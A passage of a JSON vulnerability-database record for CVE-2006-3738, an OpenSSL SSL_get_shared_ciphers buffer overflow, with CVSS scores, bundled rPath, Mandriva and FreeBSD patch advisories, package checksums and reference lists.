            "@id": "https://www.variotdbs.pl/ref/cvss/cvssV2"
          },
          "cvssV3": {
            "@container": "@list",
            "@context": {
              "@vocab": "https://www.variotdbs.pl/ref/cvss/cvssV3#"
            },
            "@id": "https://www.variotdbs.pl/ref/cvss/cvssV3/"
          },
          "severity": {
            "@container": "@list",
            "@context": {
              "@vocab": "https://www.variotdbs.pl/cvss/severity#"
            },
            "@id": "https://www.variotdbs.pl/ref/cvss/severity"
          },
          "sources": {
            "@container": "@list",
            "@context": {
              "@vocab": "https://www.variotdbs.pl/ref/sources#"
            },
            "@id": "https://www.variotdbs.pl/ref/sources"
          }
        },
        "data": [
          {
            "cvssV2": [
              {
                "accessComplexity": "LOW",
                "accessVector": "NETWORK",
                "authentication": "NONE",
                "author": "nvd@nist.gov",
                "availabilityImpact": "COMPLETE",
                "baseScore": 10.0,
                "confidentialityImpact": "COMPLETE",
                "exploitabilityScore": 10.0,
                "id": "CVE-2006-3738",
                "impactScore": 10.0,
                "integrityImpact": "COMPLETE",
                "severity": "HIGH",
                "trust": 1.0,
                "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C",
                "version": "2.0"
              }
            ],
            "cvssV3": [],
            "severity": [
              {
                "author": "nvd@nist.gov",
                "id": "CVE-2006-3738",
                "trust": 1.0,
                "value": "HIGH"
              },
              {
                "author": "CARNEGIE MELLON",
                "id": "VU#386964",
                "trust": 0.8,
                "value": "0.32"
              },
              {
                "author": "CARNEGIE MELLON",
                "id": "VU#845620",
                "trust": 0.8,
                "value": "7.56"
              },
              {
                "author": "CARNEGIE MELLON",
                "id": "VU#547300",
                "trust": 0.8,
                "value": "2.53"
              }
            ]
          }
        ],
        "sources": [
          {
            "db": "CERT/CC",
            "id": "VU#386964"
          },
          {
            "db": "CERT/CC",
            "id": "VU#845620"
          },
          {
            "db": "CERT/CC",
            "id": "VU#547300"
          },
          {
            "db": "NVD",
            "id": "CVE-2006-3738"
          }
        ]
      },
      "description": {
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/description#",
          "sources": {
            "@container": "@list",
            "@context": {
              "@vocab": "https://www.variotdbs.pl/ref/sources#"
            }
          }
        },
        "data": "Buffer overflow in the SSL_get_shared_ciphers function in OpenSSL 0.9.7 before 0.9.7l, 0.9.8 before 0.9.8d, and earlier versions has unspecified impact and remote attack vectors involving a long list of ciphers. A flaw in the OpenSSL library could allow a remote attacker to cause a denial of service on an affected application. Multiple RSA implementations fail to properly handle RSA signatures. This vulnerability may allow an attacker to forge RSA signatures. \nSuccessfully exploiting this issue may result in the execution of arbitrary machine code in the context of applications that use the affected library. Failed exploit attempts may crash applications, denying service to legitimate users. rPath Security Advisory: 2006-0175-2\nPublished: 2006-09-28\nUpdated:\n    2006-09-29 Resolved issue in patch for CVE-2006-2940\nProducts: rPath Linux 1\nRating: Major\nExposure Level Classification:\n    Remote Deterministic Unauthorized Access\nUpdated Versions:\n    openssl=/conary.rpath.com@rpl:devel//1/0.9.7f-10.5-1\n    openssl-scripts=/conary.rpath.com@rpl:devel//1/0.9.7f-10.5-1\n\nReferences:\n    http://www.cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2006-2937\n    http://www.cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2006-2940\n    http://www.cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2006-3738\n    http://www.cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2006-4343\n    http://issues.rpath.com/browse/RPL-613\n\nDescription:\n    Previous versions of the openssl package are vulnerable to multiple\n    attacks. \n    In particular, any connection that the mysql daemon will accept\n    may be vulnerable.  In the default configuration of mysql, that\n    would be a local unauthorized access vulnerability, but mysql can\n    be configured to listen for network connections from remote hosts,\n    which would then enable remote unauthorized access.  Any program\n    that calls the SSL_get_shared_ciphers() function may be vulnerable. \n    \n    29 September 2006 Update: The initial fix for this vulnerability was\n    incomplete, and the fault in the fix could enable a Denial of Service\n    attack in some cases of the attack described in CVE-2006-2940. \n\n_______________________________________________\nFull-Disclosure - We believe in it. \n\n During the parsing of certain invalid ASN1 structures an error\n condition is mishandled. This can result in an infinite loop which\n consumes system memory. (CVE-2006-2937)\n\n Certain types of public key can take disproportionate amounts of time\n to process. This could be used by an attacker in a denial of service\n attack. (CVE-2006-2940)\n\n Tavis Ormandy and Will Drewry of the Google Security Team discovered a\n buffer overflow in the SSL_get_shared_ciphers utility function, used by\n some applications such as exim and mysql.  An attacker could send a\n list of ciphers that would overrun a buffer. (CVE-2006-3738)\n\n Tavis Ormandy and Will Drewry of the Google Security Team discovered a\n possible DoS in the sslv2 client code. (CVE-2006-4343)\n\n Updated packages are patched to address these issues. \n\n Update:\n\n There was an error in the original published patches for CVE-2006-2940. \n New packages have corrected this issue. \n _______________________________________________________________________\n\n References:\n \n http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2006-2937\n http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2006-2940\n http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2006-3738\n http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2006-4343\n _______________________________________________________________________\n \n Updated Packages:\n \n Mandriva Linux 2006.0:\n 5e48a8d9a6a03a045b6d0d2b6903dc5b  2006.0/i586/libopenssl0.9.7-0.9.7g-2.5.20060mdk.i586.rpm\n f86f3a2efd19ff5fb1600212cbd8e463  2006.0/i586/libopenssl0.9.7-devel-0.9.7g-2.5.20060mdk.i586.rpm\n 73b99c1a8a34fe3c2279c09c4f385804  2006.0/i586/libopenssl0.9.7-static-devel-0.9.7g-2.5.20060mdk.i586.rpm\n 526fcd69e1a1768c82afd573dc16982f  2006.0/i586/openssl-0.9.7g-2.5.20060mdk.i586.rpm \n 441a806fc8a50f74f5b4bcfce1fc8f66  2006.0/SRPMS/openssl-0.9.7g-2.5.20060mdk.src.rpm\n\n Mandriva Linux 2006.0/X86_64:\n 54ed69fc4976d3c0953eeebd3c10471a  2006.0/x86_64/lib64openssl0.9.7-0.9.7g-2.5.20060mdk.x86_64.rpm\n 632fbe5eaff684ec2f27da4bbe93c4f6  2006.0/x86_64/lib64openssl0.9.7-devel-0.9.7g-2.5.20060mdk.x86_64.rpm\n 04dbe52bda3051101db73fabe687bd7e  2006.0/x86_64/lib64openssl0.9.7-static-devel-0.9.7g-2.5.20060mdk.x86_64.rpm\n 5e48a8d9a6a03a045b6d0d2b6903dc5b  2006.0/x86_64/libopenssl0.9.7-0.9.7g-2.5.20060mdk.i586.rpm\n f86f3a2efd19ff5fb1600212cbd8e463  2006.0/x86_64/libopenssl0.9.7-devel-0.9.7g-2.5.20060mdk.i586.rpm\n 73b99c1a8a34fe3c2279c09c4f385804  2006.0/x86_64/libopenssl0.9.7-static-devel-0.9.7g-2.5.20060mdk.i586.rpm\n ca169246cc85db55839b265b90e8c842  2006.0/x86_64/openssl-0.9.7g-2.5.20060mdk.x86_64.rpm \n 441a806fc8a50f74f5b4bcfce1fc8f66  2006.0/SRPMS/openssl-0.9.7g-2.5.20060mdk.src.rpm\n\n Mandriva Linux 2007.0:\n db68f8f239604fb76a0a10c70104ef61  2007.0/i586/libopenssl0.9.8-0.9.8b-2.2mdv2007.0.i586.rpm\n 26a4de823aee08e40d28ed7e6ff5b2ff  2007.0/i586/libopenssl0.9.8-devel-0.9.8b-2.2mdv2007.0.i586.rpm\n ab949cf85296ceae864f83fbbac2b55a  2007.0/i586/libopenssl0.9.8-static-devel-0.9.8b-2.2mdv2007.0.i586.rpm\n a97c6033a33fabcd5509568304b7a988  2007.0/i586/openssl-0.9.8b-2.2mdv2007.0.i586.rpm \n 78964615b7bd71028671257640be3bc5  2007.0/SRPMS/openssl-0.9.8b-2.2mdv2007.0.src.rpm\n\n Mandriva Linux 2007.0/X86_64:\n 1895971ef1221056075c4ee3d4aaac72  2007.0/x86_64/lib64openssl0.9.8-0.9.8b-2.2mdv2007.0.x86_64.rpm\n cfd59201e5e9c436f42b969b4aa567f1  2007.0/x86_64/lib64openssl0.9.8-devel-0.9.8b-2.2mdv2007.0.x86_64.rpm\n 36da85c76eddf95feeb3f4b792528483  2007.0/x86_64/lib64openssl0.9.8-static-devel-0.9.8b-2.2mdv2007.0.x86_64.rpm\n db68f8f239604fb76a0a10c70104ef61  2007.0/x86_64/libopenssl0.9.8-0.9.8b-2.2mdv2007.0.i586.rpm\n 26a4de823aee08e40d28ed7e6ff5b2ff  2007.0/x86_64/libopenssl0.9.8-devel-0.9.8b-2.2mdv2007.0.i586.rpm\n ab949cf85296ceae864f83fbbac2b55a  2007.0/x86_64/libopenssl0.9.8-static-devel-0.9.8b-2.2mdv2007.0.i586.rpm\n e3aebeae455a0820c5f28483bd6d3fa5  2007.0/x86_64/openssl-0.9.8b-2.2mdv2007.0.x86_64.rpm \n 78964615b7bd71028671257640be3bc5  2007.0/SRPMS/openssl-0.9.8b-2.2mdv2007.0.src.rpm\n\n Corporate 3.0:\n 7f60837e42b45ce50f365ec1372d6aeb  corporate/3.0/i586/libopenssl0.9.7-0.9.7c-3.7.C30mdk.i586.rpm\n 1e7834f6f0fe000f8f00ff49ee6f7ea0  corporate/3.0/i586/libopenssl0.9.7-devel-0.9.7c-3.7.C30mdk.i586.rpm\n 6c86220445ef34c2dadadc3e00701885  corporate/3.0/i586/libopenssl0.9.7-static-devel-0.9.7c-3.7.C30mdk.i586.rpm\n c25c4042a91b6e7bf9aae1aa2fea32a5  corporate/3.0/i586/openssl-0.9.7c-3.7.C30mdk.i586.rpm \n 2c47b1604aa89033799b1ead4bcebe01  corporate/3.0/SRPMS/openssl-0.9.7c-3.7.C30mdk.src.rpm\n\n Corporate 3.0/X86_64:\n 52dfd4d10e00c9bd0944e4486190de93  corporate/3.0/x86_64/lib64openssl0.9.7-0.9.7c-3.7.C30mdk.x86_64.rpm\n 258a19afc44dadfaa00d0ebd8b3c0df4  corporate/3.0/x86_64/lib64openssl0.9.7-devel-0.9.7c-3.7.C30mdk.x86_64.rpm\n cd5cc151e476552be549c6a37b8a71ea  corporate/3.0/x86_64/lib64openssl0.9.7-static-devel-0.9.7c-3.7.C30mdk.x86_64.rpm\n 7f60837e42b45ce50f365ec1372d6aeb  corporate/3.0/x86_64/libopenssl0.9.7-0.9.7c-3.7.C30mdk.i586.rpm\n 492fcc0df9172557a3297d0082321d4d  corporate/3.0/x86_64/openssl-0.9.7c-3.7.C30mdk.x86_64.rpm \n 2c47b1604aa89033799b1ead4bcebe01  corporate/3.0/SRPMS/openssl-0.9.7c-3.7.C30mdk.src.rpm\n\n Corporate 4.0:\n 76b3078e53be2ddc019bee74ccb1f39e  corporate/4.0/i586/libopenssl0.9.7-0.9.7g-2.5.20060mlcs4.i586.rpm\n 0aa4ca3b0d2925255650fb90132d7aad  corporate/4.0/i586/libopenssl0.9.7-devel-0.9.7g-2.5.20060mlcs4.i586.rpm\n 86dc91f1701293f3319a833746bbe421  corporate/4.0/i586/libopenssl0.9.7-static-devel-0.9.7g-2.5.20060mlcs4.i586.rpm\n daa6c3473f59405778dedd02de73fcc9  corporate/4.0/i586/openssl-0.9.7g-2.5.20060mlcs4.i586.rpm \n a8d2a946d266a94c6d46537ad78b18fa  corporate/4.0/SRPMS/openssl-0.9.7g-2.5.20060mlcs4.src.rpm\n\n Corporate 4.0/X86_64:\n b5ae71aacd5b99be9e9327d58da29230  corporate/4.0/x86_64/lib64openssl0.9.7-0.9.7g-2.5.20060mlcs4.x86_64.rpm\n 89296e03778a198940c1c413e44b9f45  corporate/4.0/x86_64/lib64openssl0.9.7-devel-0.9.7g-2.5.20060mlcs4.x86_64.rpm\n cb17a0d801c1181ab380472b8ffb085e  corporate/4.0/x86_64/lib64openssl0.9.7-static-devel-0.9.7g-2.5.20060mlcs4.x86_64.rpm\n 76b3078e53be2ddc019bee74ccb1f39e  corporate/4.0/x86_64/libopenssl0.9.7-0.9.7g-2.5.20060mlcs4.i586.rpm\n 0aa4ca3b0d2925255650fb90132d7aad  corporate/4.0/x86_64/libopenssl0.9.7-devel-0.9.7g-2.5.20060mlcs4.i586.rpm\n 86dc91f1701293f3319a833746bbe421  corporate/4.0/x86_64/libopenssl0.9.7-static-devel-0.9.7g-2.5.20060mlcs4.i586.rpm\n 8d9a55afdc6d930916bac00fd4c4739b  corporate/4.0/x86_64/openssl-0.9.7g-2.5.20060mlcs4.x86_64.rpm \n a8d2a946d266a94c6d46537ad78b18fa  corporate/4.0/SRPMS/openssl-0.9.7g-2.5.20060mlcs4.src.rpm\n\n Multi Network Firewall 2.0:\n cd7ad7e95ce17995dfa8129ebe517049  mnf/2.0/i586/libopenssl0.9.7-0.9.7c-3.7.M20mdk.i586.rpm\n 11771240baebdc6687af70a8a0f2ffd2  mnf/2.0/i586/libopenssl0.9.7-devel-0.9.7c-3.7.M20mdk.i586.rpm\n 8f672bc81b9528598a8560d876612bfa  mnf/2.0/i586/libopenssl0.9.7-static-devel-0.9.7c-3.7.M20mdk.i586.rpm\n 214f857a36e5c3e600671b7291cd08ae  mnf/2.0/i586/openssl-0.9.7c-3.7.M20mdk.i586.rpm \n bbb299fd643ccbfbdc1a48b12c7005ce  mnf/2.0/SRPMS/openssl-0.9.7c-3.7.M20mdk.src.rpm\n _______________________________________________________________________\n\n To upgrade automatically use MandrivaUpdate or urpmi.  The verification\n of md5 checksums and GPG signatures is performed automatically for you. \n\n All packages are signed by Mandriva for security.  You can obtain the\n GPG public key of the Mandriva Security Team by executing:\n\n  gpg --recv-keys --keyserver pgp.mit.edu 0x22458A98\n\n You can view other update advisories for Mandriva Linux at:\n\n  http://www.mandriva.com/security/advisories\n\n If you want to report vulnerabilities, please contact\n\n  security_(at)_mandriva.com\n _______________________________________________________________________\n\n Type Bits/KeyID     Date       User ID\n pub  1024D/22458A98 2000-07-10 Mandriva Security Team\n  \u003csecurity*mandriva.com\u003e\n-----BEGIN PGP SIGNATURE-----\nVersion: GnuPG v1.4.2.2 (GNU/Linux)\n\niD8DBQFFIU7bmqjQ0CJFipgRAuYAAKCZlwMqJzrVCpKYdEqs+UiyM6WrSQCfeIv3\nmAaLoEPfjUca1TR98vgpZUU=\n=Ff9O\n-----END PGP SIGNATURE-----\n\n_______________________________________________\nFull-Disclosure - We believe in it. \nCharter: http://lists.grok.org.uk/full-disclosure-charter.html\nHosted and sponsored by Secunia - http://secunia.com/\n. -----BEGIN PGP SIGNED MESSAGE-----\nHash: SHA1\n\n=============================================================================\nFreeBSD-SA-07:08.openssl                                    Security Advisory\n                                                          The FreeBSD Project\n\nTopic:          Buffer overflow in OpenSSL SSL_get_shared_ciphers()\n\nCategory:       contrib\nModule:         openssl\nAnnounced:      2007-10-03\nCredits:        Moritz Jodeit\nAffects:        All FreeBSD releases. \nCorrected:      2007-10-03 21:39:43 UTC (RELENG_6, 6.2-STABLE)\n                2007-10-03 21:40:35 UTC (RELENG_6_2, 6.2-RELEASE-p8)\n                2007-10-03 21:41:22 UTC (RELENG_6_1, 6.1-RELEASE-p20)\n                2007-10-03 21:42:00 UTC (RELENG_5, 5.5-STABLE)\n                2007-10-03 21:42:32 UTC (RELENG_5_5, 5.5-RELEASE-p16)\nCVE Name:       CVE-2007-5135\n\nFor general information regarding FreeBSD Security Advisories,\nincluding descriptions of the fields above, security branches, and the\nfollowing sections, please visit \u003cURL:http://security.FreeBSD.org/\u003e. \n\nI.   Background\n\nFreeBSD includes software from the OpenSSL Project.  The OpenSSL Project is\na collaborative effort to develop a robust, commercial-grade, full-featured,\nand Open Source toolkit implementing the Secure Sockets Layer (SSL v2/v3)\nand Transport Layer Security (TLS v1) protocols as well as a full-strength\ngeneral purpose cryptography library. \n\nII.  Problem Description\n\nA buffer overflow addressed in FreeBSD-SA-06:23.openssl has been found\nto be incorrectly fixed. \n\nIII. \n\nIV.  Workaround\n\nNo workaround is available, but only applications using the\nSSL_get_shared_ciphers() function are affected. \n\nV.   Solution\n\nPerform one of the following:\n\n1) Upgrade your vulnerable system to 5-STABLE, or 6-STABLE, or to the\nRELENG_6_2, RELENG_6_1, or RELENG_5_5 security branch dated after the\ncorrection date. \n\n2) To patch your present system:\n\nThe following patch have been verified to apply to FreeBSD 5.5, 6.1,\nand 6.2 systems. \n\na) Download the relevant patch from the location below, and verify the\ndetached PGP signature using your PGP utility. \n\n# fetch http://security.FreeBSD.org/patches/SA-07:08/openssl.patch\n# fetch http://security.FreeBSD.org/patches/SA-07:08/openssl.patch.asc\n\nb) Execute the following commands as root:\n\n# cd /usr/src\n# patch \u003c /path/to/patch\n# cd /usr/src/secure/lib/libssl\n# make obj \u0026\u0026 make depend \u0026\u0026 make \u0026\u0026 make install\n\nVI.  Correction details\n\nThe following list contains the revision numbers of each file that was\ncorrected in FreeBSD. \n\nBranch                                                           Revision\n  Path\n- -------------------------------------------------------------------------\nRELENG_5\n  src/crypto/openssl/ssl/ssl_lib.c                           1.1.1.11.2.3\nRELENG_5_5\n  src/UPDATING                                            1.342.2.35.2.16\n  src/sys/conf/newvers.sh                                  1.62.2.21.2.18\n  src/crypto/openssl/ssl/ssl_lib.c                       1.1.1.11.2.1.4.2\nRELENG_6\n  src/crypto/openssl/ssl/ssl_lib.c                           1.1.1.12.2.2\nRELENG_6_2\n  src/UPDATING                                            1.416.2.29.2.11\n  src/sys/conf/newvers.sh                                  1.69.2.13.2.11\n  src/crypto/openssl/ssl/ssl_lib.c                       1.1.1.12.2.1.2.1\nRELENG_6_1\n  src/UPDATING                                            1.416.2.22.2.22\n  src/sys/conf/newvers.sh                                  1.69.2.11.2.22\n  src/crypto/openssl/ssl/ssl_lib.c                           1.1.1.12.6.2\n- -------------------------------------------------------------------------\n\nVII. References\n\nhttp://marc.info/?l=bugtraq\u0026m=119091888624735\nhttp://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2006-3738\nhttp://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2007-5135\n\nThe latest revision of this advisory is available at\nhttp://security.FreeBSD.org/advisories/FreeBSD-SA-07:08.openssl.asc\n-----BEGIN PGP SIGNATURE-----\nVersion: GnuPG v1.4.7 (FreeBSD)\n\niD8DBQFHBA+HFdaIBMps37IRAtTQAJ0bFBZt7DVJzhQkUcu7VdNS7Kj8cwCeMQaS\ncNFjW3j2eolZhlee83l3blo=\n=zwC2\n-----END PGP SIGNATURE-----\n",
        "sources": [
          {
            "db": "NVD",
            "id": "CVE-2006-3738"
          },
          {
            "db": "CERT/CC",
            "id": "VU#386964"
          },
          {
            "db": "CERT/CC",
            "id": "VU#845620"
          },
          {
            "db": "CERT/CC",
            "id": "VU#547300"
          },
          {
            "db": "BID",
            "id": "20249"
          },
          {
            "db": "PACKETSTORM",
            "id": "50595"
          },
          {
            "db": "PACKETSTORM",
            "id": "50543"
          },
          {
            "db": "PACKETSTORM",
            "id": "59797"
          }
        ],
        "trust": 3.6
      },
      "external_ids": {
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/external_ids#",
          "data": {
            "@container": "@list"
          },
          "sources": {
            "@container": "@list",
            "@context": {
              "@vocab": "https://www.variotdbs.pl/ref/sources#"
            }
          }
        },
        "data": [
          {
            "db": "BID",
            "id": "22083",
            "trust": 3.4
          },
          {
            "db": "SECUNIA",
            "id": "23280",
            "trust": 2.6
          },
          {
            "db": "SECUNIA",
            "id": "23309",
            "trust": 2.6
          },
          {
            "db": "BID",
            "id": "20249",
            "trust": 2.1
          },
          {
            "db": "CERT/CC",
            "id": "VU#547300",
            "trust": 2.1
          },
          {
            "db": "SECUNIA",
            "id": "22207",
            "trust": 1.8
          },
          {
            "db": "SECUNIA",
            "id": "22212",
            "trust": 1.8
          },
          {
            "db": "SECUNIA",
            "id": "22116",
            "trust": 1.8
          },
          {
            "db": "SECUNIA",
            "id": "22216",
            "trust": 1.8
          },
          {
            "db": "SECUNIA",
            "id": "22220",
            "trust": 1.8
          },
          {
            "db": "SECUNIA",
            "id": "22330",
            "trust": 1.8
          },
          {
            "db": "SECUNIA",
            "id": "22130",
            "trust": 1.8
          },
          {
            "db": "SECUNIA",
            "id": "22240",
            "trust": 1.8
          },
          {
            "db": "SECUNIA",
            "id": "22259",
            "trust": 1.8
          },
          {
            "db": "SECUNIA",
            "id": "22260",
            "trust": 1.8
          },
          {
            "db": "SECUNIA",
            "id": "22165",
            "trust": 1.8
          },
          {
            "db": "SECUNIA",
            "id": "22166",
            "trust": 1.8
          },
          {
            "db": "SECUNIA",
            "id": "22172",
            "trust": 1.8
          },
          {
            "db": "SECUNIA",
            "id": "22284",
            "trust": 1.8
          },
          {
            "db": "SECUNIA",
            "id": "22186",
            "trust": 1.8
          },
          {
            "db": "SECUNIA",
            "id": "22193",
            "trust": 1.8
          },
          {
            "db": "SECUNIA",
            "id": "22094",
            "trust": 1.8
          },
          {
            "db": "SECTRACK",
            "id": "1016943",
            "trust": 1.8
          },
          {
            "db": "NVD",
            "id": "CVE-2006-3738",
            "trust": 1.6
          },
          {
            "db": "SECUNIA",
            "id": "30161",
            "trust": 1.0
          },
          {
            "db": "SECUNIA",
            "id": "26329",
            "trust": 1.0
          },
          {
            "db": "SECUNIA",
            "id": "24930",
            "trust": 1.0
          },
          {
            "db": "SECUNIA",
            "id": "30124",
            "trust": 1.0
          },
          {
            "db": "SECUNIA",
            "id": "22500",
            "trust": 1.0
          },
          {
            "db": "SECUNIA",
            "id": "22799",
            "trust": 1.0
          },
          {
            "db": "SECUNIA",
            "id": "22298",
            "trust": 1.0
          },
          {
            "db": "SECUNIA",
            "id": "31492",
            "trust": 1.0
          },
          {
            "db": "SECUNIA",
            "id": "23038",
            "trust": 1.0
          },
          {
            "db": "SECUNIA",
            "id": "22460",
            "trust": 1.0
          },
          {
            "db": "SECUNIA",
            "id": "23915",
            "trust": 1.0
          },
          {
            "db": "SECUNIA",
            "id": "22385",
            "trust": 1.0
          },
          {
            "db": "SECUNIA",
            "id": "23155",
            "trust": 1.0
          },
          {
            "db": "SECUNIA",
            "id": "22487",
            "trust": 1.0
          },
          {
            "db": "SECUNIA",
            "id": "22654",
            "trust": 1.0
          },
          {
            "db": "SECUNIA",
            "id": "23680",
            "trust": 1.0
          },
          {
            "db": "SECUNIA",
            "id": "22626",
            "trust": 1.0
          },
          {
            "db": "SECUNIA",
            "id": "23794",
            "trust": 1.0
          },
          {
            "db": "SECUNIA",
            "id": "22633",
            "trust": 1.0
          },
          {
            "db": "SECUNIA",
            "id": "22772",
            "trust": 1.0
          },
          {
            "db": "SECUNIA",
            "id": "24950",
            "trust": 1.0
          },
          {
            "db": "SECUNIA",
            "id": "25889",
            "trust": 1.0
          },
          {
            "db": "SECUNIA",
            "id": "22544",
            "trust": 1.0
          },
          {
            "db": "SECUNIA",
            "id": "23340",
            "trust": 1.0
          },
          {
            "db": "SECUNIA",
            "id": "22791",
            "trust": 1.0
          },
          {
            "db": "SECUNIA",
            "id": "22758",
            "trust": 1.0
          },
          {
            "db": "VUPEN",
            "id": "ADV-2007-1401",
            "trust": 1.0
          },
          {
            "db": "VUPEN",
            "id": "ADV-2007-0343",
            "trust": 1.0
          },
          {
            "db": "VUPEN",
            "id": "ADV-2006-3902",
            "trust": 1.0
          },
          {
            "db": "VUPEN",
            "id": "ADV-2006-3869",
            "trust": 1.0
          },
          {
            "db": "VUPEN",
            "id": "ADV-2006-3860",
            "trust": 1.0
          },
          {
            "db": "VUPEN",
            "id": "ADV-2006-4401",
            "trust": 1.0
          },
          {
            "db": "VUPEN",
            "id": "ADV-2006-4314",
            "trust": 1.0
          },
          {
            "db": "VUPEN",
            "id": "ADV-2007-2315",
            "trust": 1.0
          },
          {
            "db": "VUPEN",
            "id": "ADV-2006-4264",
            "trust": 1.0
          },
          {
            "db": "VUPEN",
            "id": "ADV-2006-4036",
            "trust": 1.0
          },
          {
            "db": "VUPEN",
            "id": "ADV-2006-4417",
            "trust": 1.0
          },
          {
            "db": "VUPEN",
            "id": "ADV-2006-4750",
            "trust": 1.0
          },
          {
            "db": "VUPEN",
            "id": "ADV-2006-3820",
            "trust": 1.0
          },
          {
            "db": "VUPEN",
            "id": "ADV-2007-2783",
            "trust": 1.0
          },
          {
            "db": "VUPEN",
            "id": "ADV-2006-3936",
            "trust": 1.0
          },
          {
            "db": "VUPEN",
            "id": "ADV-2006-4443",
            "trust": 1.0
          },
          {
            "db": "SECTRACK",
            "id": "1017522",
            "trust": 1.0
          },
          {
            "db": "USCERT",
            "id": "TA06-333A",
            "trust": 1.0
          },
          {
            "db": "OSVDB",
            "id": "29262",
            "trust": 1.0
          },
          {
            "db": "BID",
            "id": "20246",
            "trust": 0.8
          },
          {
            "db": "CERT/CC",
            "id": "VU#386964",
            "trust": 0.8
          },
          {
            "db": "SECUNIA",
            "id": "21709",
            "trust": 0.8
          },
          {
            "db": "CERT/CC",
            "id": "VU#845620",
            "trust": 0.8
          },
          {
            "db": "XF",
            "id": "29237",
            "trust": 0.8
          },
          {
            "db": "PACKETSTORM",
            "id": "50595",
            "trust": 0.1
          },
          {
            "db": "PACKETSTORM",
            "id": "50543",
            "trust": 0.1
          },
          {
            "db": "PACKETSTORM",
            "id": "59797",
            "trust": 0.1
          }
        ],
        "sources": [
          {
            "db": "CERT/CC",
            "id": "VU#386964"
          },
          {
            "db": "CERT/CC",
            "id": "VU#845620"
          },
          {
            "db": "CERT/CC",
            "id": "VU#547300"
          },
          {
            "db": "BID",
            "id": "20249"
          },
          {
            "db": "PACKETSTORM",
            "id": "50595"
          },
          {
            "db": "PACKETSTORM",
            "id": "50543"
          },
          {
            "db": "PACKETSTORM",
            "id": "59797"
          },
          {
            "db": "NVD",
            "id": "CVE-2006-3738"
          }
        ]
      },
      "id": "VAR-200609-1274",
      "iot": {
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/iot#",
          "sources": {
            "@container": "@list",
            "@context": {
              "@vocab": "https://www.variotdbs.pl/ref/sources#"
            }
          }
        },
        "data": true,
        "sources": [
          {
            "db": "VARIoT devices database",
            "id": null
          }
        ],
        "trust": 0.28107159000000004
      },
      "last_update_date": "2026-03-07T22:10:40.447000Z",
      "problemtype_data": {
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/problemtype_data#",
          "sources": {
            "@container": "@list",
            "@context": {
              "@vocab": "https://www.variotdbs.pl/ref/sources#"
            }
          }
        },
        "data": [
          {
            "problemtype": "CWE-119",
            "trust": 1.0
          }
        ],
        "sources": [
          {
            "db": "NVD",
            "id": "CVE-2006-3738"
          }
        ]
      },
      "references": {
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/references#",
          "data": {
            "@container": "@list"
          },
          "sources": {
            "@container": "@list",
            "@context": {
              "@vocab": "https://www.variotdbs.pl/ref/sources#"
            }
          }
        },
        "data": [
          {
            "trust": 3.4,
            "url": "http://www.securityfocus.com/bid/22083"
          },
          {
            "trust": 2.6,
            "url": "http://www.openssl.org/news/secadv_20060928.txt"
          },
          {
            "trust": 1.8,
            "url": "http://sunsolve.sun.com/search/document.do?assetkey=1-26-102668-1"
          },
          {
            "trust": 1.6,
            "url": "http://secunia.com/advisories/23280/"
          },
          {
            "trust": 1.6,
            "url": "http://secunia.com/advisories/23309/"
          },
          {
            "trust": 1.3,
            "url": "http://support.avaya.com/elmodocs2/security/asa-2006-260.htm"
          },
          {
            "trust": 1.3,
            "url": "http://www.cisco.com/warp/public/707/cisco-sr-20061108-openssl.shtml"
          },
          {
            "trust": 1.3,
            "url": "http://kolab.org/security/kolab-vendor-notice-11.txt"
          },
          {
            "trust": 1.3,
            "url": "http://www.kb.cert.org/vuls/id/547300"
          },
          {
            "trust": 1.1,
            "url": "http://issues.rpath.com/browse/rpl-613"
          },
          {
            "trust": 1.0,
            "url": "http://secunia.com/advisories/22385"
          },
          {
            "trust": 1.0,
            "url": "http://secunia.com/advisories/22172"
          },
          {
            "trust": 1.0,
            "url": "http://secunia.com/advisories/26329"
          },
          {
            "trust": 1.0,
            "url": "https://oval.cisecurity.org/repository/search/definition/oval%3aorg.mitre.oval%3adef%3a4256"
          },
          {
            "trust": 1.0,
            "url": "http://secunia.com/advisories/22330"
          },
          {
            "trust": 1.0,
            "url": "http://secunia.com/advisories/22220"
          },
          {
            "trust": 1.0,
            "url": "http://marc.info/?l=bugtraq\u0026m=130497311408250\u0026w=2"
          },
          {
            "trust": 1.0,
            "url": "http://secunia.com/advisories/22116"
          },
          {
            "trust": 1.0,
            "url": "http://secunia.com/advisories/22799"
          },
          {
            "trust": 1.0,
            "url": "http://secunia.com/advisories/22094"
          },
          {
            "trust": 1.0,
            "url": "http://secunia.com/advisories/22654"
          },
          {
            "trust": 1.0,
            "url": "http://www.vmware.com/support/esx25/doc/esx-254-200612-patch.html"
          },
          {
            "trust": 1.0,
            "url": "http://www.vupen.com/english/advisories/2006/3860"
          },
          {
            "trust": 1.0,
            "url": "http://www.debian.org/security/2006/dsa-1185"
          },
          {
            "trust": 1.0,
            "url": "http://secunia.com/advisories/22193"
          },
          {
            "trust": 1.0,
            "url": "http://secunia.com/advisories/22216"
          },
          {
            "trust": 1.0,
            "url": "http://www.vupen.com/english/advisories/2006/4401"
          },
          {
            "trust": 1.0,
            "url": "http://www.oracle.com/technetwork/topics/security/cpujan2007-101493.html"
          },
          {
            "trust": 1.0,
            "url": "http://secunia.com/advisories/22633"
          },
          {
            "trust": 1.0,
            "url": "http://www.mandriva.com/security/advisories?name=mdksa-2006:172"
          },
          {
            "trust": 1.0,
            "url": "http://securitytracker.com/id?1017522"
          },
          {
            "trust": 1.0,
            "url": "http://www.redhat.com/support/errata/rhsa-2008-0629.html"
          },
          {
            "trust": 1.0,
            "url": "http://www.securityfocus.com/archive/1/447318/100/0/threaded"
          },
          {
            "trust": 1.0,
            "url": "http://slackware.com/security/viewer.php?l=slackware-security\u0026y=2006\u0026m=slackware-security.676946"
          },
